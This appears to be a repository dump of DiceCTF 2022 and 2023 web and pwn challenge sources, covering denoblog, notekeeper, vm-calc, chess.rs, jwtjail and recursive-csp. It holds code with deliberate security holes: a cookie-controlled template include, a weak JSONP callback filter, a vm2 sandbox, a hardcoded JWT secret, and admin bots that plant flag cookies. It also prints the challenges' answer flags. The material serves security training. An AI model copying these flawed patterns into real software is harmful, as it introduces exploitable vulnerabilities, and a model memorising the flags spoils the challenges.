20 | COPY config/nginx.conf /etc/nginx/nginx.conf
21 | 
22 | EXPOSE 80
23 | 
24 | CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Hard
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | I love NodeJS and all, but I've heard that Deno is pretty cool...
 8 | 
 9 | I'm making my new blog on it! Even if there's a vuln, Deno will protect me, right?
10 | ```
11 | 
12 | Flag: `dice{but_1_th0ught_den0s_permissi0ns_w0uld_s4ve_m3.....:<}`
13 | 


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/challenge/app.ts:
--------------------------------------------------------------------------------
 1 | import { serve } from "https://deno.land/std/http/server.ts";
 2 | import * as cookie from "https://deno.land/std/http/cookie.ts";
 3 | 
 4 | import * as dejs from "https://deno.land/x/dejs/mod.ts";
 5 | 
 6 | const port = 8080;
 7 | 
 8 | const handler = async (req: Request): Promise<Response> => {
 9 |   let lang = cookie.getCookies(req.headers)["lang"] ?? "en";
10 | 
11 |   let body = await dejs.renderFileToString("./views/index.ejs", { lang });
12 | 
13 |   let headers = new Headers();
14 |   headers.set("content-type", "text/html");
15 | 
16 |   return new Response(body, { headers, status: 200 }); 
17 | };
18 | 
19 | console.log("[app] server now listening for connections...");
20 | await serve(handler, { port });


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/challenge/langs/en:
--------------------------------------------------------------------------------
1 | <%
2 |     i18n = {
3 |         "HEADER": "Welcome to my blog!",
4 |         "SWITCH_LANG": "Switch language:",
5 |         "COMING_SOON": "Blog posts coming soon..."
6 |     };
7 | %>


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/challenge/langs/es:
--------------------------------------------------------------------------------
1 | <%
2 |     i18n = {
3 |         "HEADER": "¡Bienvenido a mi blog!",
4 |         "SWITCH_LANG": "Cambiar de idioma:",
5 |         "COMING_SOON": "Publicaciones de blog próximamente..."
6 |     };
7 | %>


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/challenge/views/index.ejs:
--------------------------------------------------------------------------------
 1 | <% await include(`./langs/${lang}`); %>
 2 | <!DOCTYPE html>
 3 | <html>
 4 | <head>
 5 |     <title>denoblog</title>
 6 |     <link rel="stylesheet" href="https://unpkg.com/@picocss/pico@latest/css/pico.classless.min.css">
 7 | </head>
 8 | <body>
 9 |     <main>
10 |         <hgroup>
11 |             <h1>denoblog</h1>
12 |             <h2><%= i18n.HEADER %></h2>
13 |         </hgroup>
14 |         <nav>
15 |             <ul>
16 |                 <li><%= i18n.SWITCH_LANG %></li>
17 |                 <li><a href="javascript:document.cookie = 'lang=en'; location.reload();">English</a></li>
18 |                 <li><a href="javascript:document.cookie = 'lang=es'; location.reload();">Español</a></li>
19 |             </ul>
20 |           </nav>
21 |         <hr />
22 |         <%= i18n.COMING_SOON %>
23 |     </main>
24 | </body>
25 | </html>


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/config/nginx.conf:
--------------------------------------------------------------------------------
 1 | pid /run/nginx.pid;
 2 | error_log /dev/stderr info;
 3 | 
 4 | events {
 5 |     worker_connections 1024;
 6 | }
 7 | 
 8 | http {
 9 |     server_tokens off;
10 |     log_format docker '$remote_addr $remote_user $status "$request" "$http_referer" "$http_user_agent" ';
11 |     access_log /dev/stdout docker;
12 | 
13 |     charset utf-8;
14 |     keepalive_timeout 20s;
15 |     sendfile on;
16 |     tcp_nopush on;
17 |     client_max_body_size 1M;
18 | 
19 |     include /etc/nginx/mime.types;
20 | 
21 |     server {
22 |         listen 80;
23 |         server_name _;
24 | 
25 |         location / {
26 |             proxy_pass http://localhost:8080;
27 |             proxy_set_header Host $host;
28 |             proxy_set_header X-Forwarded-For $remote_addr;
29 |         }
30 |     }
31 | }


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/config/supervisord.conf:
--------------------------------------------------------------------------------
 1 | [supervisord]
 2 | user=root
 3 | nodaemon=true
 4 | logfile=/dev/null
 5 | logfile_maxbytes=0
 6 | pidfile=/run/supervisord.pid
 7 | 
 8 | [program:deno]
 9 | command=/app/app
10 | autorestart=true
11 | stdout_logfile=/dev/stdout
12 | stdout_logfile_maxbytes=0
13 | stderr_logfile=/dev/stderr
14 | stderr_logfile_maxbytes=0
15 | user=nobody
16 | 
17 | [program:nginx]
18 | command=nginx -g 'daemon off;'
19 | stdout_logfile=/dev/stdout
20 | stdout_logfile_maxbytes=0
21 | stderr_logfile=/dev/stderr
22 | stderr_logfile_maxbytes=0


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/flag.txt:
--------------------------------------------------------------------------------
1 | dice{test_flag}


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/denoblog/readflag


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:current-buster-slim
 2 |     
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | RUN chown node:node /app/uploads
14 | 
15 | USER node
16 | 
17 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Insane
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | Yet another note keeping application... but this one supports voice memos!!!
 8 | ```
 9 | 
10 | Flag: `dice{jsonp_how_could_you_do_this_to_me}`
11 | 


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "notekeeper",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "Strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "argon2": "^0.28.3",
13 |     "cookie-parser": "^1.4.6",
14 |     "express": "^4.17.2",
15 |     "express-jwt": "^6.1.0",
16 |     "jsonwebtoken": "^8.5.1",
17 |     "multer": "^1.4.4",
18 |     "uuid": "^8.3.2"
19 |   }
20 | }
21 | 


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.eot


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.ttf


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.woff


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-brands-400.woff2


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.eot


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.ttf


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.woff


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-regular-400.woff2


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.eot


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.ttf


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.woff


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/public/assets/fonts/fa-solid-900.woff2


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/src/jwt.js:
--------------------------------------------------------------------------------
 1 | const jwt = require("jsonwebtoken");
 2 | const secret = process.env.JWT_SECRET || "jwt secret";
 3 | 
 4 | const sign = (username, alert) => {
 5 | 	return jwt.sign({
 6 | 		username,
 7 | 		alert
 8 | 	}, secret);
 9 | };
10 | 
11 | const signData = (res, username, alert) => {
12 |     res.cookie('session', sign(username, alert), { httpOnly: true });
13 | };
14 | 
15 | module.exports = {
16 | 	secret, signData
17 | };


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/src/utils.js:
--------------------------------------------------------------------------------
 1 | const jwt = require("./jwt.js");
 2 | 
 3 | const jsonp = (req, res, type, data) => {
 4 |     if(req.query.callback && (typeof req.query.callback !== "string" || req.query.callback.includes('eval'))) {
 5 |         return res.status(400).send('no');
 6 |     }
 7 |     req.query.callback = req.query.callback || "load_" + type;
 8 |     res.jsonp(data);
 9 | };
10 | 
11 | const alert = (req, res, type, msg) => {
12 |     jwt.signData(res, req.user?.username, { type, msg });
13 | };
14 | 
15 | module.exports = { jsonp, alert };


--------------------------------------------------------------------------------
/DiceCTF-2022/notekeeper/uploads/flag.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2022/notekeeper/uploads/flag.mp3


--------------------------------------------------------------------------------
/DiceCTF-2022/vm-calc/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:16.13.1-bullseye-slim
 2 |     
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | USER node
14 | 
15 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/DiceCTF-2022/vm-calc/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Medium
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | A simple and very secure online calculator!
 8 | ```
 9 | 
10 | Flag: `dice{y0u_4re_a_tru3_vm2_j4ilbreak3r!!!}`
11 | 


--------------------------------------------------------------------------------
/DiceCTF-2022/vm-calc/flag.txt:
--------------------------------------------------------------------------------
1 | dice{test_flag}


--------------------------------------------------------------------------------
/DiceCTF-2022/vm-calc/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "vm-calc",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "Strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.17.2",
13 |     "hbs": "^4.2.0",
14 |     "vm2": "^3.9.5"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/DiceCTF-2022/vm-calc/views/admin.hbs:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <title>vm-calc | admin</title>
 5 |         <link rel="stylesheet" href="https://cdn.simplecss.org/simple.min.css" />
 6 |     </head>
 7 |     <body>
 8 |         <header>
 9 |             <nav>
10 |                 <a href="/">Home</a>
11 |                 <a href="/admin">Admin</a>
12 |             </nav>
13 |             <h1>vm-calc | admin</h1>
14 |             <p>Log into the admin account here.</p>
15 |         </header>
16 | 
17 |         <main>
18 |             <h4>Login:</h4>
19 |             {{#if error}}
20 |             <p>Error: {{error}}</p>
21 |             {{/if}}
22 |             {{#if flag}}
23 |             <p>Flag: {{flag}}</p>
24 |             {{/if}}
25 | 
26 |             <form method="POST" id="form">
27 |                 <input name="user" placeholder="Username" />
28 |                 <input name="pass" placeholder="Password" />
29 |                 <input type="submit" />
30 |             </form>
31 |         </main>
32 |     </body>
33 | </html>


--------------------------------------------------------------------------------
/DiceCTF-2022/vm-calc/views/index.hbs:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <title>vm-calc</title>
 5 |         <link rel="stylesheet" href="https://cdn.simplecss.org/simple.min.css" />
 6 |     </head>
 7 |     <body>
 8 |         <header>
 9 |             <nav>
10 |                 <a href="/">Home</a>
11 |                 <a href="/admin">Admin</a>
12 |             </nav>
13 |             <h1>vm-calc</h1>
14 |             <p>A simple and very secure online calculator!</p>
15 |         </header>
16 | 
17 |         <main>
18 |             <h4>Enter math expression here:</h4>
19 |             <form method="POST" id="form">
20 |                 <input name="calc" placeholder="1 + 1" style="width: 100%" autocomplete="off" />
21 |                 <input type="submit" value="Calculate" />
22 |             </form>
23 |             {{#if result}}
24 |             <p>Result: {{result}}</p>
25 |             {{/if}}
26 |         </main>
27 |     </body>
28 | </html>


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/adminbot.js:
--------------------------------------------------------------------------------
 1 | import flag from './flag.txt'
 2 | 
 3 | function sleep(time) {
 4 |   return new Promise(resolve => {
 5 |     setTimeout(resolve, time)
 6 |   })
 7 | }
 8 | 
 9 | export default {
10 |   name: 'chess.rs admin bot',
11 |   urlRegex: /^https?:\/\/.*\//,
12 |   timeout: 10000,
13 |   handler: async (url, ctx) => {
14 |     const page = await ctx.newPage();
15 |     await page.goto('https://chessrs.mc.ax', { timeout: 3000, waitUntil: 'domcontentloaded' });
16 |     await page.evaluate(flag => {
17 |         document.cookie = `flag=${flag}`;
18 |     }, flag);
19 |     await page.goto(url, { timeout: 3000, waitUntil: 'domcontentloaded' });
20 |     await sleep(3000);
21 |   }
22 | }
23 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge.yml:
--------------------------------------------------------------------------------
 1 | name: chess.rs
 2 | author: strellic
 3 | description: |-
 4 |   🚀 blazingfast rust wasm chess 🚀
 5 | 
 6 |   (the flag is in the admin bot's cookie)
 7 | 
 8 |   {{ link }}
 9 | 
10 |   [Admin Bot]({{ adminbot }})
11 | flag:
12 |   file: ./flag.txt
13 | sortWeight: 70
14 | provide:
15 |   - chessrs.tar.gz
16 |   - adminbot-test.js
17 | containers:
18 |   main:
19 |     replicas: 2
20 |     build: challenge
21 |     ports:
22 |       - 1337
23 | expose:
24 |   main:
25 |     - target: 1337
26 |       http: chessrs
27 |       healthContent: chess
28 | adminbot: adminbot.js
29 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | # build phase
 2 | FROM rust:slim AS builder
 3 | 
 4 | WORKDIR /app
 5 | COPY ./app .
 6 | RUN cargo build --release
 7 | 
 8 | # final image
 9 | FROM debian:bullseye-slim
10 | 
11 | WORKDIR /app
12 | COPY --from=builder /app/target/release/app ./
13 | COPY --from=builder /app/static ./static/
14 | 
15 | RUN useradd -ms /bin/bash user
16 | USER user
17 | 
18 | CMD ["/app/app"]


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "app"
 3 | version = "0.1.0"
 4 | authors = ["strellic"]
 5 | edition = "2021"
 6 | 
 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 8 | 
 9 | [dependencies]
10 | axum = "0.6.4"
11 | axum-extra = { version = "0.4.2", features = ["spa"] }
12 | tokio = { version = "1.24.2", features = ["full"] }
13 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/css/styles.css:
--------------------------------------------------------------------------------
 1 | body {
 2 |   background-color: #161925;
 3 |   height: 100vh;
 4 | }
 5 | 
 6 | h1, h2, h3, h4, h5, h6 {
 7 |   color: #f1f2f6;
 8 | }
 9 | 
10 | .card-title, .card-text {
11 |   color: #161925;
12 | }
13 | 
14 | .chessboard-parent {
15 |   width: 75vh;
16 | }
17 | 
18 | #chessboard {
19 |   height: 100%;
20 |   width: 100%;
21 | }
22 | 
23 | .history-parent {
24 |   max-height: 75vh;
25 | }
26 | 
27 | #engine {
28 |   display: none;
29 | }
30 | 
31 | .navbar > div > .navbar-brand {
32 |   color: black;
33 | }
34 | 
35 | .navbar.navbar-dark > div > .navbar-brand {
36 |   color: white;
37 | }


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/engine.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <body>
 4 |         <script type="module">
 5 |             import * as chess from "/js/chess_wasm.js";
 6 |             await chess.default();
 7 | 
 8 |             window.onmessage = (e) => {
 9 |                 if (typeof e.data !== "object") return;
10 |                 e.source.postMessage(chess.handle(JSON.stringify(e.data)), e.origin);
11 |             };
12 | 
13 |             window.top.postMessage("ready", "*");
14 |         </script>
15 |     </body>
16 | </html>


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/LICENSE.txt:
--------------------------------------------------------------------------------
1 | By Cburnett - Own work, CC BY-SA 3.0, https://commons.wikimedia.org/w/index.php?curid=1499806
2 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bB.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bK.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bN.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bN.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bP.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bQ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bQ.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/bR.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wB.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wK.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wN.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wN.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wP.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wQ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wQ.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/img/chesspieces/wikipedia/wR.png


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/js/chess_wasm_bg.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/js/chess_wasm_bg.wasm


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/app/static/mp3/move.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/challenge/app/static/mp3/move.mp3


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # use if you want to build everything and test locally
3 | cd chess-wasm && wasm-pack build --no-typescript --release --target web && cd ..
4 | cd app && cargo build --release && cd ..
5 | cp chess-wasm/pkg/chess_wasm* app/static/js/
6 | cd app && cargo run --release && cd ..


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/challenge/chess-wasm/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "chess-wasm"
 3 | version = "0.1.0"
 4 | authors = ["strellic"]
 5 | edition = "2021"
 6 | 
 7 | [lib]
 8 | crate-type = ["cdylib", "rlib"]
 9 | 
10 | [dependencies]
11 | wasm-bindgen = "0.2.63"
12 | once_cell = "1.17.0"
13 | serde = { version = "1.0.152", features = ["derive"] }
14 | serde_json = "1.0.91"
15 | serde-wasm-bindgen = "0.4.5"
16 | anyhow = "1.0.68"
17 | shakmaty = "0.23.0"
18 | 
19 | [profile.release]
20 | # Tell `rustc` to optimize for small code size.
21 | opt-level = "s"
22 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/chessrs.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/pwn/chessrs/chessrs.tar.gz


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/flag.txt:
--------------------------------------------------------------------------------
1 | dice{even_my_pwn_ch4lls_have_an_adm1n_b0t!!!}
2 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/pwn/chessrs/make_handout.sh:
--------------------------------------------------------------------------------
1 | tar --owner="strell" --group="strell" -H v7 --no-xattr --mtime=1970-01-01T00:00Z -czvf chessrs.tar.gz challenge --transform s/challenge/chessrs/
2 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/challenge.yml:
--------------------------------------------------------------------------------
 1 | name: jwtjail
 2 | author: strellic
 3 | description: |-
 4 |   A simple tool to verify your JWTs!
 5 | 
 6 |   Oh, that CVE? Don't worry, we're running the latest version.
 7 | 
 8 |   [Instancer]({{ instancer }})
 9 | 
10 | flag:
11 |   file: challenge/flag.txt
12 | sortWeight: 30
13 | provide:
14 |   - jwtjail.tar.gz
15 | 
16 | containers:
17 |   app:
18 |     build: challenge
19 |     ports:
20 |       - 12345
21 | expose:
22 |   app:
23 |     - target: 12345
24 |       http: jwtjail
25 | instancer:
26 |   timeout: 600000
27 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:19-alpine3.16
 2 | 
 3 | WORKDIR /app
 4 | COPY package.json ./
 5 | COPY public ./public
 6 | RUN npm i
 7 | COPY app.js .
 8 | 
 9 | COPY flag.txt /flag.txt
10 | COPY readflag /readflag
11 | RUN chmod 400 /flag.txt
12 | RUN chmod 6755 /readflag
13 | 
14 | RUN adduser -D user
15 | USER user
16 | 
17 | CMD ["/bin/sh", "-c", "while true; do node app.js; done"]


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/challenge/flag.txt:
--------------------------------------------------------------------------------
1 | dice{th3y_retr4cted_the_cve_:(}


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/challenge/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "jwtjail",
 3 |   "version": "1.0.0",
 4 |   "main": "app.js",
 5 |   "scripts": {
 6 |     "test": "echo \"Error: no test specified\" && exit 1"
 7 |   },
 8 |   "author": "",
 9 |   "license": "ISC",
10 |   "description": "",
11 |   "dependencies": {
12 |     "express": "^4.18.2",
13 |     "jsonwebtoken": "^9.0.0"
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/challenge/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/web/jwtjail/challenge/readflag


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/jwtjail.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/web/jwtjail/jwtjail.tar.gz


--------------------------------------------------------------------------------
/DiceCTF-2023/web/jwtjail/make_handout.sh:
--------------------------------------------------------------------------------
1 | cp -r challenge jwtjail
2 | echo -n "dice{test_flag}" > jwtjail/flag.txt
3 | tar --owner="strell" --group="strell" -H v7 --no-xattr --mtime=1970-01-01T00:00Z -czvf jwtjail.tar.gz jwtjail
4 | rm -rf jwtjail
5 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/adminbot.js:
--------------------------------------------------------------------------------
 1 | import flag from './flag.txt'
 2 | 
 3 | function sleep(time) {
 4 |   return new Promise(resolve => {
 5 |     setTimeout(resolve, time)
 6 |   })
 7 | }
 8 | 
 9 | export default {
10 |   name: 'recursive-csp admin bot',
11 |   urlRegex: /^https:\/\/recursive-csp\.mc\.ax\//,
12 |   timeout: 10000,
13 |   handler: async (url, ctx) => {
14 |     const page = await ctx.newPage();
15 |     await page.goto('https://recursive-csp.mc.ax', { timeout: 3000, waitUntil: 'domcontentloaded' });
16 |     await page.evaluate(flag => {
17 |         document.cookie = `flag=${flag}`;
